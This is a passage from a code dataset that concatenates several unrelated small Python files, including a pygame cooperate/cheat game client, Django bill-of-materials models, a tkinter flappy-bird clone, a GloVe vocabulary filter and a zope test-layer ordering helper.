text = font.render(\"Your Move\", 1, (0, 255, 255))\n win.blit(text, (80, 300))\n\n text = font.render(\"Opponent\", 1, (0, 255, 255))\n win.blit(text, (380, 300))\n\n text = font.render(\"Your Score\", 1, (0, 255, 255))\n win.blit(text, (80, 100))\n\n text = font.render(\"Opponent\", 1, (0, 255, 255))\n win.blit(text, (380, 100))\n\n font = pygame.font.SysFont(\"comicsans\", 90)\n if p == 0:\n text_1 = font.render(\"{0}\".format(score[0]), 1, (0, 0, 255))\n text_2 = font.render(\"{0}\".format(score[1]), 1, (0, 0, 255))\n\n else:\n text_1 = font.render(\"{0}\".format(score[1]), 1, (0, 0, 255))\n text_2 = font.render(\"{0}\".format(score[0]), 1, (0, 0, 255))\n\n win.blit(text_1, (160, 185))\n win.blit(text_2, (470, 185))\n\n move1 = game.get_player_move(0)\n move2 = game.get_player_move(1)\n font = pygame.font.SysFont(\"comicsans\", 60)\n if game.both_went():\n text1 = font.render(move1, 1, (0, 0, 0))\n text2 = font.render(move2, 1, (0, 0, 0))\n else:\n if game.p1Went and p == 0:\n text1 = font.render(move1, 1, (0, 0, 0))\n elif game.p1Went:\n text1 = font.render(\"Locked In\", 1, (0, 0, 0))\n else:\n text1 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n if game.p2Went and p == 1:\n text2 = font.render(move2, 1, (0, 0, 0))\n elif game.p2Went:\n text2 = font.render(\"Locked In\", 1, (0, 0, 0))\n else:\n text2 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n if p == 1:\n win.blit(text2, (100, 400))\n win.blit(text1, (400, 400))\n else:\n win.blit(text1, (100, 400))\n win.blit(text2, (400, 400))\n\n for btn in btns:\n btn.draw(win)\n\n pygame.display.update()\n\n\nbtns = [Button(\"Cheat\", 100, 500, (0, 0, 0)), Button(\"Cooperate\", 410, 500, (255, 0, 0))]\n\n\ndef main():\n run = True\n clock = pygame.time.Clock()\n n = Network()\n player = int(n.get_p())\n print(\"You are player \", player)\n score = [0, 0]\n round_count = 0\n\n while run:\n clock.tick(60)\n try:\n game = n.send(\"get\")\n except:\n run = False\n print(\"Couldn't get game\")\n break\n\n if game.both_went():\n redraw_window(win, game, player, score)\n pygame.time.delay(500)\n try:\n game = n.send(\"reset\")\n except:\n run = False\n print(\"Couldn't get game\")\n break\n\n font = pygame.font.SysFont(\"comicsans\", 90)\n if game.winner() == 3 and player == 0:\n text = font.render(\"+3\", 1, (255, 0, 0))\n score[0] += 3\n score[1] -= 1\n elif game.winner() == 3 and player == 1:\n text = font.render(\"-1\", 1, (255, 0, 0))\n score[0] += 3\n score[1] -= 1\n elif game.winner() == 2:\n text = font.render(\"+2\", 1, (255, 0, 0))\n score[0] += 2\n score[1] += 2\n elif game.winner() == -1 and player == 0:\n text = font.render(\"-1\", 1, (255, 0, 0))\n score[0] -= 1\n score[1] += 3\n elif game.winner() == -1 and player == 1:\n text = font.render(\"+3\", 1, (255, 0, 0))\n score[0] -= 1\n score[1] += 3\n elif game.winner() == 0:\n text = font.render(\"+0\", 1, (255, 0, 0))\n\n round_count += 1\n\n win.blit(text, (width/2 - text.get_width()/2, height/2 - text.get_height()/2))\n pygame.display.update()\n pygame.time.delay(2000)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n for btn in btns:\n if btn.click(pos) and game.connected():\n if player == 0:\n if not game.p1Went:\n n.send(btn.text)\n else:\n if not game.p2Went:\n n.send(btn.text)\n\n if round_count == 6:\n font = pygame.font.SysFont(\"comicsans\", 40)\n if score[0] > score[1] and player == 0:\n text = font.render(\"You Won! Final score: [{0}] - [{1}]\".format(score[0], score[1]), 1, (255, 0, 0))\n elif score[0] < score[1] and player == 1:\n text = font.render(\"You Won! Final score: [{0}] - [{1}]\".format(score[1], score[0]), 1, (255, 0, 0))\n elif score[0] > score[1] and player == 1:\n text = font.render(\"You Lost! Final score: [{0}] - [{1}]\".format(score[1], score[0]), 1, (255, 0, 0))\n elif score[0] < score[1] and player == 0:\n text = font.render(\"You Lost! Final score: [{0}] - [{1}]\".format(score[0], score[1]), 1, (255, 0, 0))\n else:\n text = font.render(\"Tie Game! Final score: [{0}] - [{1}]\".format(score[0], score[1]), 1, (255, 0, 0))\n win.blit(text, (150, 50))\n pygame.display.update()\n pygame.time.delay(5000)\n run = False\n\n redraw_window(win, game, player, score)\n\n\ndef menu_screen():\n run = True\n clock = pygame.time.Clock()\n\n while run:\n clock.tick(60)\n win.fill((128, 128, 128))\n font = pygame.font.SysFont(\"comicsans\", 60)\n text = font.render(\"Click to Play!\", 1, (255, 0, 0))\n win.blit(text, (200, 200))\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n run = False\n\n main()\n\n\nwhile True:\n menu_screen()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"294371646","text":"import pickle\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nprint(\"Read files...\")\r\niterator = pd.read_csv('data/glove.42B.300d.txt', header=None, index_col=0, \r\n delim_whitespace=True, quoting=csv.QUOTE_NONE, dtype=\"str\", chunksize=100000)\r\n\r\nwith open('dumps/word_counts.pkl', 'rb') as f:\r\n word_dict = pickle.load(f)\r\nprint(\"Done.\")\r\n\r\ndf = pd.DataFrame()\r\n\r\nwords = set(word_dict.keys())\r\n\r\ntotal = 0\r\nin_glove = 0\r\ntotal_ubuntu = len(words)\r\n\r\nprint(\"Iterating through chunks...\")\r\ndone = 0\r\n# Iterate chunk by chunk\r\nfor i in iterator:\r\n total += i.shape[0]\r\n unique_toks = set(i.index.values)\r\n in_glove += len(unique_toks.intersection(words))\r\n\r\n remain = unique_toks - words\r\n df = df.append(i.drop(remain, axis=0))\r\n done += 1\r\n print(\"Batch {} done\".format(done))\r\nprint(\"Done.\")\r\n\r\n# Print compression percentage\r\nfiltered = df.shape[0]\r\nprint(\"Kept {0:.4f}% of the rows\".format((filtered/total) * 100))\r\nprint(\"{0:.4f}% of tokens were in glove\".format(in_glove/total_ubuntu))\r\n\r\ndf.to_csv(\"data/glove_filtered.txt\", sep=\" \", header=False, index=True, quoting=csv.QUOTE_NONE)","sub_path":"src/models/glove_filter.py","file_name":"glove_filter.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"444526186","text":"##############################################################################\n# Parte do livro Introdução à Programação com Python\n# Autor: Nilo Ney Coutinho Menezes\n# Editora Novatec (c) 2010-2019\n# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8\n# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3\n# Terceira edição - Janeiro/2019 - ISBN 978-85-7522-718-3\n# Site: http://python.nilo.pro.br/\n#\n# Arquivo: listagem3\\capítulo 10\\10.13.py\n# Descrição:\n##############################################################################\n\nfrom clientes import Cliente\nfrom bancos import Banco\nfrom contas import Conta\njoão = Cliente(\"João da Silva\", \"3241-5599\")\nmaria = Cliente(\"Maria Silva\", \"7231-9955\")\njosé = Cliente(\"José Vargas\", \"9721-3040\")\ncontaJM = Conta([joão, maria], 100)\ncontaJ = Conta([josé], 10)\ntatu = Banco(\"Tatú\")\ntatu.abre_conta(contaJM)\ntatu.abre_conta(contaJ)\ntatu.lista_contas()\n","sub_path":"capitulo 10/10.13.py","file_name":"10.13.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"528067388","text":"# coding=utf-8\n# 0wd4 - 2015/11/15\n# python2.7\n\nimport sys\n\ndef main():\n\tcontent = sys.argv[1]\n\tcontent += '\\n'\n\n\tfile = open('diary.txt', 'a+')\n\n\tfile.write(content)\n\t\n\tfile.seek(0,0)\n\tprint(file.read())\n\n\tfile.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"_src/om2py0w/0wex1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"146925538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 21 16:32:29 2019\n\n@author: Arjun\n\"\"\"\n\nx=int(input())\nk=x\ns=0\nwhile x>1:\n if x%2==0:\n x=x/2\n s=s+1\n else:\n print(\"no\")\n break\nif (2**s)==k:\n print(\"yes\")\n","sub_path":"Python/PowOf2.py","file_name":"PowOf2.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"123582152","text":"from django.db import models\nfrom django.utils.text import slugify\nfrom django.db.models.signals import pre_save\nfrom django.core.exceptions import ValidationError\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import GenericRelation\nfrom django.core.validators import RegexValidator\n\n\n\n\nACTIVE='A'\nDEACTIVE='D'\nSTATUS_CHOICES = (\n (ACTIVE, 'Active'),\n (DEACTIVE, 'Deactive'),\n )\n\nclass Bom(models.Model):\n\tname \t\t\t= models.CharField(max_length=50,primary_key=True,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='Name does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\tpn \t\t\t\t= models.CharField(verbose_name ='Part Number',max_length=50,blank=True, null=True,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='Part number does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\trev \t\t\t= models.CharField(verbose_name ='Revision',max_length=10,blank=True, null=True)\n\ttitle \t\t\t= models.CharField(max_length=100,blank=True, null=True)\n\tslug \t\t\t= models.SlugField(unique=True,blank=True, null=True)\n\tdescription \t= models.TextField(blank=True, null=True)\n\tfg_pn \t\t\t= models.CharField(verbose_name ='Finish Goods Part Number',max_length=50,blank=True, null=True)\n\tfg_rev \t\t\t= models.CharField(verbose_name ='Finish Goods Revision',max_length=10,blank=True, null=True)\n\tcategory1 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcategory2 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tstatus \t\t\t= models.CharField(max_length=1,choices=STATUS_CHOICES,default=ACTIVE)\n\tcreated_date \t= models.DateTimeField(auto_now_add=True)\n\tmodified_date \t= models.DateTimeField(blank=True, null=True,auto_now=True)\n\tuser \t\t\t= models.ForeignKey(settings.AUTH_USER_MODEL,\n\t\t\t\t\t\t\ton_delete=models.SET_NULL,\n\t\t\t\t\t\t\tblank=True,null=True)\n\t\n\t@property\n\tdef items_count(self):\n\t\t# c = self.weight + self.runner\n\t\treturn self.items.count()\n\titems_count.fget.short_description = \"Total Items\"\n\t\n\tdef __str__(self):\n\t\treturn self.name\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('bom:detail', kwargs={'slug': self.slug})\n\n\t# def item_count(self):\n\t# \treturn self.bom_detail_set.count()\n\ndef create_bom_slug(instance, new_slug=None):\n # import datetime\n default_slug = '%s' % (instance.name)\n slug = slugify(default_slug)\n if new_slug is not None:\n slug = new_slug\n qs = Bom.objects.filter(slug=slug)\n exists = qs.exists()\n if exists:\n new_slug = \"%s-%s\" %(slug,qs.count())\n return create_bom_slug(instance, new_slug=new_slug)\n return slug\n\ndef pre_save_bom_receiver(sender, instance, *args, **kwargs):\n\tif not instance.slug:\n\t\tinstance.slug = create_bom_slug(instance)\n\npre_save.connect(pre_save_bom_receiver, sender=Bom)\n\n\n\n\nPART_TYPE_CHOICE = (\n\t\t('COMPONENT','Component'),\n\t\t('MODULE','Module with serial number'),\n\t\t('BUILD','Inernal Build with serial number')\n\t)\n\nPACKAGE_FAMILY_CHOICE = (\n\t\t('IP','Through-hole'),\n\t\t('SFM','Surface mount'),\n\t\t('CC','Chip carrier'),\n\t\t('PGA','Pin grid arrays'),\n\t\t('FP','Flat packages'),\n\t\t('SOP','Small outline packages'),\n\t\t('CSP','Chip-scale packages'),\n\t\t('BGA','Ball grid array'),\n\t\t('OTHER','Transistor, diode, small-pin-count IC packages'),\n\t)\n\nclass Bom_Detail(models.Model):\n\trd \t\t\t\t= models.CharField(verbose_name ='Ref Destinator',max_length=50,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='RD does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\tpn \t\t\t\t= models.CharField(verbose_name ='Part Number',max_length=50,\n\t\t\t\t\t\tvalidators=[\n\t\t\t\t\t\t\t\t\t\tRegexValidator(\n\t\t\t\t\t\t\t\t\t\t\tregex='^[\\w-]+$',\n\t\t\t\t\t\t\t\t\t\t\tmessage='Part number does not allow special charecters',\n\t\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t])\n\tcustomer_pn \t= models.CharField(verbose_name ='Customer Part Number',max_length=50,blank=True, null=True)\n\tpn_type\t\t\t= models.CharField(verbose_name ='Part Type',max_length=10,choices=PART_TYPE_CHOICE,default='COMPONENT')\n\tbom \t\t\t= models.ForeignKey(Bom,\n\t\t\t\t\t\t\t\ton_delete=models.CASCADE,\n\t\t\t\t\t\t\t\trelated_name='items')\n\ttitle \t\t\t= models.CharField(max_length=100,blank=True, null=True)\n\tslug \t\t\t= models.SlugField(unique=True,blank=True, null=True)\n\tdescription \t= models.TextField(max_length=255,blank=True, null=True)\n\tcategory1 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcategory2 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcritical \t\t= models.BooleanField(default=False)\n\tpin \t\t\t= models.IntegerField(default = 1)\n\tthickness \t\t= models.DecimalField(max_digits = 5,decimal_places = 2, default=0.18)\n\tpackage \t\t= models.CharField(max_length=20,blank=True, null=True)\n\tpackage_family \t= models.CharField(max_length=10,choices=PACKAGE_FAMILY_CHOICE,default='SFM')\n\tstatus \t\t\t= models.CharField(max_length=1,choices=STATUS_CHOICES,default=ACTIVE)\n\tcreated_date \t= models.DateTimeField(auto_now_add=True)\n\tmodified_date \t= models.DateTimeField(blank=True, null=True,auto_now=True)\n\tuser \t\t\t= models.ForeignKey(settings.AUTH_USER_MODEL,\n\t\t\t\t\t\ton_delete=models.SET_NULL,\n\t\t\t\t\t\tblank=True,null=True)\n\t\n\tclass Meta:\n\t\tunique_together = ('rd','pn','bom')\n\n\tdef __str__(self):\n\t\treturn ('%s : %s' % (self.rd,self.pn))\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('bom:item-detail', kwargs={'slug': self.slug})\n\ndef create_bom_detail_slug(instance, new_slug=None):\n # import datetime\n default_slug = '%s-%s-%s' % (instance.bom,instance.pn,instance.rd)\n slug = slugify(default_slug)\n if new_slug is not None:\n slug = new_slug\n qs = Bom_Detail.objects.filter(slug=slug)\n exists = qs.exists()\n if exists:\n new_slug = \"%s-%s\" %(slug,qs.count())\n return pre_save_bom_detail_receiver(instance, new_slug=new_slug)\n return slug\n\ndef pre_save_bom_detail_receiver(sender, instance, *args, **kwargs):\n\tif not instance.slug:\n\t\tinstance.slug = create_bom_detail_slug(instance)\n\npre_save.connect(pre_save_bom_detail_receiver, sender=Bom_Detail)\n\n\n\nclass Alternate_Part(models.Model):\n\tbom_detail \t\t= models.ForeignKey(Bom_Detail,\n\t\t\t\t\t\ton_delete=models.CASCADE,\n\t\t\t\t\t\trelated_name='alternates')\n\tpn \t\t\t\t= models.CharField(verbose_name ='Part Number',max_length=50)\n\tcustomer_pn \t= models.CharField(max_length=50,blank=True, null=True)\n\tordered \t\t= models.IntegerField(default=1)\n\ttitle \t\t\t= models.CharField(max_length=100,blank=True, null=True)\n\tdescription \t= models.TextField(max_length=255,blank=True, null=True)\n\tcategory1 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tcategory2 \t\t= models.CharField(max_length=50,blank=True, null=True)\n\tstatus \t\t\t= models.CharField(max_length=1,choices=STATUS_CHOICES,default=ACTIVE)\n\tcreated_date \t= models.DateTimeField(auto_now_add=True)\n\tmodified_date \t= models.DateTimeField(blank=True, null=True,auto_now=True)\n\tuser \t\t\t= models.ForeignKey(settings.AUTH_USER_MODEL,\n\t\t\t\t\t\ton_delete=models.SET_NULL,\n\t\t\t\t\t\tblank=True,null=True)\n\n\tdef __str__(self):\n\t\treturn ('%s : %s' % (self.bom_detail,self.pn))","sub_path":"wmp/bom/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"654066968","text":"from zope.testing.testrunner.find import name_from_layer\n\n\ndef order_by_bases(layers):\n \"\"\"Order the layers from least to most specific (bottom to top)\n\n >>> class TestLayer(object):\n ... def __init__(self, bases, name):\n ... self.__bases__ = bases\n ... self.__name__ = name\n ... def __repr__(self):\n ... return self.__name__\n\n A layer without any base:\n\n >>> zero = TestLayer(bases=(), name='zero')\n\n A layer with a single base:\n\n >>> one = TestLayer(bases=(zero, ), name='one')\n\n Less specific comes first:\n\n >>> order_by_bases([one, zero])\n [zero, one]\n >>> order_by_bases([zero, one])\n [zero, one]\n\n\n Another layer with a single base:\n\n >>> one_bis = TestLayer(bases=(zero, ), name='one_bis')\n\n Less specific comes first:\n\n >>> order_by_bases([one, zero, one_bis])\n [zero, one, one_bis]\n\n Order of layers of identical specificity does not depend\n on their order in the input:\n\n >>> order_by_bases([one_bis, zero, one])\n [zero, one, one_bis]\n >>> order_by_bases([one_bis, one, zero])\n [zero, one, one_bis]\n >>> order_by_bases([zero, one_bis, one])\n [zero, one, one_bis]\n\n Another layer with a single base:\n\n >>> one_ter = TestLayer(bases=(zero, ), name='one_ter')\n\n Less specific still comes first:\n\n >>> order_by_bases([one_bis, one_ter, one, zero])\n [zero, one, one_bis, one_ter]\n\n Order of layers of identical specificity does still not depend\n on their order in the input:\n\n >>> order_by_bases([one_ter, one_bis, one, zero])\n [zero, one, one_bis, one_ter]\n >>> order_by_bases([zero, one_ter, one_bis, one])\n [zero, one, one_bis, one_ter]\n\n A layer with two bases of different specificity:\n\n >>> two = TestLayer(bases=(zero, one), name='two')\n\n Ordered by inverse specificity:\n\n >>> order_by_bases([two, one, zero])\n [zero, one, two]\n >>> order_by_bases([zero, two, one])\n [zero, one, two]\n >>> order_by_bases([two, zero, one])\n [zero, one, two]\n\n Another layer with two bases of different specificity:\n\n >>> two_bis = TestLayer(bases=(zero, one_bis), name='two_bis')\n\n >>> order_by_bases([two, two_bis, one, zero])\n [zero, one, two, two_bis]\n >>> order_by_bases([two_bis, two, one, zero])\n [zero, one, two, two_bis]\n\n >>> order_by_bases([one_bis, two_bis, two, one, zero])\n [zero, one, one_bis, two, two_bis]\n\n >>> three = TestLayer(bases=(one_bis, two), name='three')\n\n >>> order_by_bases([one_bis, two_bis, three, two, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n >>> order_by_bases([three, one_bis, two_bis, two, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n >>> order_by_bases([one_bis, three, two_bis, two, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n >>> order_by_bases([one_bis, two_bis, two, three, one, zero])\n [zero, one, one_bis, two, two_bis, three]\n\n Another layer without any base:\n\n >>> other_zero = TestLayer(bases=(), name='other_zero')\n\n >>> order_by_bases([other_zero, zero])\n [other_zero, zero]\n >>> order_by_bases([zero, other_zero])\n [other_zero, zero]\n\n Another layer with this new base:\n\n >>> other_one = TestLayer(bases=(other_zero, ), name='other_one')\n\n >>> order_by_bases([one, other_one])\n [one, other_one]\n >>> order_by_bases([one, other_one])\n [one, other_one]\n\n A layer with the two bases:\n\n >>> both_one = TestLayer(bases=(zero, other_zero, ), name='both_one')\n\n >>> order_by_bases([one, other_one, both_one])\n [one, other_one, both_one]\n >>> order_by_bases([one, other_one, both_one])\n [one, other_one, both_one]\n >>> order_by_bases([both_one, one, other_one])\n [one, other_one, both_one]\n >>> order_by_bases([one, both_one, other_one])\n [one, other_one, both_one]\n\n Another layer with the two bases:\n\n >>> both_one_bis = TestLayer(bases=(zero, other_zero, ),\n ... name='both_one_bis')\n\n >>> order_by_bases([both_one_bis, one, other_one, both_one])\n [one, other_one, both_one, both_one_bis]\n >>> order_by_bases([one, both_one_bis, other_one, both_one])\n [one, other_one, both_one, both_one_bis]\n >>> order_by_bases([both_one, one, both_one_bis, other_one])\n [one, other_one, both_one, both_one_bis]\n >>> order_by_bases([one, both_one, other_one, both_one_bis])\n [one, other_one, both_one, both_one_bis]\n\n Let's use a layer of specificity two:\n\n >>> order_by_bases([two, both_one_bis, one, other_one, both_one])\n [one, other_one, both_one, both_one_bis, two]\n >>> order_by_bases([one, two, both_one_bis, other_one, both_one])\n [one, other_one, both_one, both_one_bis, two]\n >>> order_by_bases([both_one, one, two, both_one_bis, other_one])\n [one, other_one, both_one, both_one_bis, two]\n >>> order_by_bases([one, both_one, two, other_one, both_one_bis])\n [one, other_one, both_one, both_one_bis, two]\n\n Another layer of specificity two:\n\n >>> other_two = TestLayer(bases=(other_one, ), name='other_two')\n\n >>> order_by_bases([other_two, two, both_one_bis, one, other_one, both_one])\n [one, other_one, both_one, both_one_bis, other_two, two]\n >>> order_by_bases([one, other_two, two, both_one_bis, other_one, both_one])\n [one, other_one, both_one, both_one_bis, other_two, two]\n >>> order_by_bases([one, both_one, other_two, two, other_one, both_one_bis])\n [one, other_one, both_one, both_one_bis, other_two, two]\n >>> order_by_bases([both_one, one, two, other_two, both_one_bis, other_one])\n [one, other_one, both_one, both_one_bis, other_two, two]\n\n \"\"\"\n named_layers = [(name_from_layer(layer), layer) for layer in layers]\n named_layers.sort()\n # Store layers along with their specificity measured by numbers of\n # sublayers.\n all_layers = {}\n for name, layer in named_layers:\n gathered = []\n gather_layers(layer, gathered)\n index = len(gathered)\n some_layers = all_layers.setdefault(index, [])\n some_layers.append(gathered)\n keys = all_layers.keys()\n keys.sort()\n # Gather them all starting by the least specific.\n gathered = []\n for key in keys:\n for some_layers in all_layers[key]:\n gathered.extend(some_layers)\n seen = {}\n result = []\n for layer in gathered:\n if layer not in seen:\n seen[layer] = 1\n if layer in layers:\n result.append(layer)\n return result\n\n\ndef gather_layers(layer, result):\n if layer is not object:\n result.append(layer)\n for b in layer.__bases__:\n gather_layers(b, result)\n","sub_path":"zope.testing/branches/gotcha-test-layers/src/zope/testing/testrunner/layerutils.py","file_name":"layerutils.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"585775104","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Account',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=10, null=True, blank=True)),\n ('name', models.CharField(max_length=100)),\n ('current_dr', models.FloatField(null=True, blank=True)),\n ('current_cr', models.FloatField(null=True, blank=True)),\n ('tax_rate', models.FloatField(null=True, blank=True)),\n ('opening_dr', models.FloatField(default=0)),\n ('opening_cr', models.FloatField(default=0)),\n ],\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('description', models.CharField(max_length=254, null=True, blank=True)),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ],\n options={\n 'verbose_name_plural': 'Categories',\n },\n ),\n migrations.CreateModel(\n name='JournalEntry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ('object_id', models.PositiveIntegerField()),\n ],\n options={\n 'verbose_name_plural': 'Journal Entries',\n },\n ),\n migrations.CreateModel(\n name='Party',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=254)),\n ('name_en', models.CharField(max_length=254, null=True)),\n ('name_ne', models.CharField(max_length=254, null=True)),\n ('address', models.TextField(null=True, blank=True)),\n ('phone_no', models.CharField(max_length=100, null=True, blank=True)),\n ('pan_no', models.CharField(max_length=50, null=True, verbose_name=b'Tax Reg. No.', blank=True)),\n ('type', models.CharField(default=b'Customer/Supplier', max_length=17, choices=[(b'Customer', b'Customer'), (b'Supplier', b'Supplier'), (b'Customer/Supplier', b'Customer/Supplier')])),\n ('account', models.ForeignKey(to='ledger.Account', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Parties',\n },\n ),\n migrations.CreateModel(\n name='Transaction',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('dr_amount', models.FloatField(null=True, blank=True)),\n ('cr_amount', models.FloatField(null=True, blank=True)),\n ('current_dr', models.FloatField(null=True, blank=True)),\n ('current_cr', models.FloatField(null=True, blank=True)),\n ('account', models.ForeignKey(to='ledger.Account')),\n ('journal_entry', models.ForeignKey(related_name='transactions', to='ledger.JournalEntry')),\n ],\n ),\n ]\n","sub_path":"apps/ledger/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"564434936","text":"from tkinter import *\r\nimport random\r\n\r\nt = Tk()\r\nclock = 0\r\nvelocity = 25\r\nobstacleslist = []\r\nchecklist = []\r\nscore = 0\r\n\r\ndef drawcircle(canv,x,y,rad):\r\n return canv.create_oval(x-rad,y-rad,x+rad,y+rad,width=0,fill='yellow')\r\n\r\ndef spawnobstacle():\r\n global c\r\n global obstacleslist\r\n global checklist\r\n \r\n hole_position = random.randint(100, 600)\r\n top_rectangle = c.create_rectangle(1201, 0 - 1000, 1201 + 50, hole_position - 75, fill='green', outline='green')\r\n bot_rectangle = c.create_rectangle(1201, 800, 1201 + 50, hole_position + 75, fill='green', outline='green')\r\n obstacleslist += [top_rectangle]\r\n checklist += [top_rectangle]\r\n obstacleslist += [bot_rectangle]\r\n checklist += [bot_rectangle]\r\n\r\ndef moveobjects():\r\n global c\r\n global circle\r\n global velocity\r\n global clock\r\n global obstacleslist\r\n global checklist\r\n global label\r\n \r\n c.move(circle, 0, -0.2*velocity)\r\n velocity -= 1\r\n\r\n if c.coords(circle)[1] < 0:\r\n if velocity > 0:\r\n velocity = -1\r\n else:\r\n velocity -= 1\r\n if c.coords(circle)[1] > 750:\r\n velocity = 0\r\n\r\n collided = False\r\n for rect in obstacleslist:\r\n c.move(rect, -3, 0)\r\n for rect in checklist:\r\n if overlap(circle, rect):\r\n c.itemconfig(rect, fill='red', outline='red')\r\n collided = True\r\n\r\n clock += 1\r\n if clock % 150 == 0:\r\n spawnobstacle()\r\n\r\n if not collided:\r\n c.after(15, moveobjects)\r\n else:\r\n label['text'] = \"Game Over! \" + label['text'] \r\n\r\ndef overlap(circle, rect):\r\n global c\r\n global clock\r\n global score\r\n global checklist\r\n global label\r\n \r\n if coords(rect)[2] < coords(circle)[0]:\r\n score += 0.5\r\n if score % 1 == 0:\r\n label['text'] = \"score: \" + str(int(score))\r\n del checklist[checklist.index(rect)]\r\n \r\n return (bpx(coords(rect)[0], coords(rect)[2], coords(circle)[0]) or bpx(coords(rect)[0], coords(rect)[2], coords(circle)[2])) and \\\r\n (bpy(coords(rect)[1], coords(rect)[3], coords(circle)[1]) or bpy(coords(rect)[1], coords(rect)[3], coords(circle)[3]))\r\n\r\ndef coords(obj):\r\n \"\"\"\r\n get coordinates\r\n \"\"\"\r\n global c\r\n return c.coords(obj)\r\n\r\ndef bpx(a, b, x):\r\n \"\"\"\r\n between points\r\n a >= x >= b\r\n \"\"\"\r\n return (b >= x and x >= a)\r\n\r\ndef bpy(a, b, x):\r\n \"\"\"\r\n between points\r\n a >= x >= b\r\n \"\"\"\r\n return (b >= x and x >= a)\r\n\r\ndef spaceevent(randomstuff):\r\n global velocity\r\n velocity = 25\r\n\r\nc = Canvas(t, width=1200, height=800, bg='lightblue')\r\nt.bind(\"\", spaceevent)\r\nc.pack()\r\nlabel = Label(t, width=30, height=1, text=\"score: 0\", font=(\"Courier\", 35))\r\nlabel.pack()\r\n\r\ncircle = drawcircle(c, 300, 400, 20)\r\n\r\nmoveobjects()\r\n\r\nt.mainloop()\r\n","sub_path":"flappy bird.py","file_name":"flappy bird.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"642091984","text":"import wx\nimport DeleteDepsql\n\n\nclass Mywin(wx.Frame):\n\n def __init__(self, parent, title):\n super(Mywin, self).__init__(parent, title=title, size=(650, 600))\n\n panel = 